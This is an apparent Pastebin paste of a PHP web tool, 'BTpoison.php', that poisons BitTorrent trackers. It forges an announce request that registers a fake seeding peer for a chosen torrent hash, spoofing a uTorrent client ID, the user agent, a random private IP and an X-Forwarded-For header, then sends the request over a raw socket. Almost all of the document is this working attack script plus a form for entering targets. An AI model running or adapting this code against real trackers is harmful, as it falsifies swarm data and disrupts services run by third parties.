Guest User

BTpoison.php

a guest
Apr 18th, 2010
3,200
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!--
  2. This script is creating a random peer on a tracker for a specific torrent, based on the announce URL and the torrent's hash.
  3. It is mostly inspired by the C# script from Burningmace : http://packetstormsecurity.org/0911-exploits/torrent-poisoning.txt
  4. Currently, only ONE request is sent to the tracker and only private IPs are used. It is enough for the proof of concept.
  5. Use it wisely, youg padawan.
  6. -->
  7. <HTML>
  8. <HEAD>
  9. <TITLE>BTpoison.php</TITLE>
  10. <STYLE TYPE="text/css">
  11. <!--
  12. BODY, TD, TH {
  13.         font-family: Verdana;
  14.         font-size: 11px;
  15.         color: #867C68;
  16. }
  17. A {
  18.         text-decoration: none;
  19. }
  20. A:HOVER {
  21.         color: #FF0000;
  22.         text-decoration: underline;
  23. }
  24. #warning {
  25.     background-color: #CC0000;
  26.         color: #FFFFFF;
  27.     padding: 5px;
  28.     margin: 20px 0px 20px 0px;
  29.     width: 600px;
  30. }
  31. #log {
  32.     background-color: #000000;
  33.         color: #FFFFFF;
  34.     padding: 5px;
  35.     margin: 20px 0px 20px 0px;
  36.     width: 600px;
  37. }
  38. PRE {
  39.         color: yellow;
  40.     white-space: pre-wrap;       /* CSS-3                  */
  41.     white-space: -moz-pre-wrap;  /* Mozilla, since 1999    */
  42.     white-space: -pre-wrap;      /* Opera 4-6              */
  43.     white-space: -o-pre-wrap;    /* Opera 7                */
  44.     word-wrap: break-word;       /* Internet Explorer 5.5+ */
  45. }
  46. -->
  47. </STYLE>
  48. </HEAD>
  49. <BODY TEXT="#867C68" LINK="#800000" ALINK="#800000" VLINK="#800000">
  50.  
  51. <h3>BTpoison.php</h3><h5>version : 0.070</h5>
  52.  
  53. <?php
  54.  
  55. $run = $_GET['run'];
  56. $announceurl = $_GET['announceurl'];
  57. $hash = $_GET['hash'];
  58.  
  59. //if (isset($run) && $run == 'Run') {
  60. if (isset($announceurl) && isset($hash)) {
  61. if ($announceurl == '' || $hash == '') { echo "<div id=\"warning\">You MUST feed me with both URL and hash !</div>"; } else {  
  62.  
  63. // ============================ START ============================
  64.  
  65. echo "<div id=\"log\">";
  66.  
  67. // gathering stuff
  68. $parsedurl = parse_url($announceurl);
  69. $host = $parsedurl[host] ;
  70. if (isset($parsedurl[port])) { $hostport = $parsedurl[port] ; } else { $hostport = 80 ; }
  71. $hostpath = $parsedurl[path] ;
  72. $tmphash = str_split($hash, 2);
  73. $encodedhash = '%'.implode("%", $tmphash); ;
  74. $clientid = '-UT1800-'.rand(10,99).rand(10000,99999).rand(10000,99999) ; // UT, AZ, TR...
  75. $left = 0 ; // bytes left (0 to seed)
  76. $event = "completed" ; // or started
  77. $port = rand(42000,42999) ;
  78. $nfetch = 5 ; // numwant
  79. $ipaddress = '192.168.'.rand(0,255).'.'.rand(0,255) ;
  80. $uagent = "uTorrent/1800(18488)" ;
  81.  
  82. echo "announce URL : $announceurl<br>" ;
  83. echo "host : $host<br><br>" ;
  84. echo "hash : $hash<br>" ;
  85. echo "encodedhash : $encodedhash<br><br>" ;
  86. echo "random peer id : $clientid<br>" ;
  87. echo "random peer ip : $ipaddress<br><br>" ;
  88.  
  89. $request = $announceurl.'?info_hash='.$encodedhash.'&peer_id='.$clientid.'&uploaded=0&downloaded=0&left='.$left.'&event='.$event.'&port='.$port.'&numwant='.$nfetch.'&ip='.$ipaddress.'&compact=1' ;
  90.  
  91. echo "BT request : ".$request."<br><br>--------------------<br><br>" ;
  92.  
  93. // cooking request
  94. $envoi = "GET $request HTTP/1.0\r\n\r\n";
  95. $envoi .= "Host: $host\r\n";
  96. $envoi .= "X-Forwarded-For: $ipaddress\r\n";
  97. $envoi .= "User-Agent: $uagent\r\n";
  98. $envoi .= "Content-type: text/html\r\n";
  99. $envoi .= "Connection: Close\r\n\r\n";
  100.  
  101. $longueur = strlen($envoi) ;
  102. echo "HTTP request : <pre>$envoi</pre>";
  103. echo "request lenth : $longueur<br><br>--------------------<br><br>";
  104.  
  105. // sending request
  106. $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  107. if($socket < 0){ die('FATAL ERROR: socket_create() : " '.socket_strerror($socket).' "'); }
  108.     else { echo "creating socket...<br>"; }
  109. if (socket_connect($socket,gethostbyname($host),$hostport) < 0){ die('FATAL ERROR: socket_connect()'); }
  110.     else { echo "connecting socket...<br>"; }
  111. if(($int = socket_write($socket, $envoi, strlen($envoi))) === false){ die('FATAL ERROR: socket_write() failed, '.$int.' characters written'); }
  112.     else { echo "sending HTTP request...<br><br>"; }
  113.  
  114. // reading answer
  115. $reception = '';
  116. while($buff = socket_read($socket, 3000)){ $reception.=$buff; }
  117. echo 'server says : <pre>'.$reception."</pre>--------------------<br>";
  118.  
  119. socket_close($socket);
  120.  
  121. echo "</div>"; //log
  122.  
  123. // ============================ END ============================
  124.  
  125.     } // else
  126. } // if isset
  127.  
  128. ?>
  129.  
  130. <form method="get" action="btpoison.php" enctype="multipart/form-data">
  131. <fieldset style="width: 600px;">
  132. <legend>torrent data</legend>
  133. <p><label for="announceurl">announce URL : </label><input type="text" name="announceurl" /><small> &raquo; http://tracker.domaine.ext/announce.php</small></p>
  134. <p><label for="hash">hash : </label><input type="text" name="hash" /><small> &raquo; 43c10318709c06f7ef7d6b4d26673378103203a3</small></p>
  135. <p><input type="submit" name="run" value="Run" /></p>
  136.  
  137. </fieldset>
  138. </form>
  139.  
  140. </BODY>
  141. </HTML>
RAW Paste Data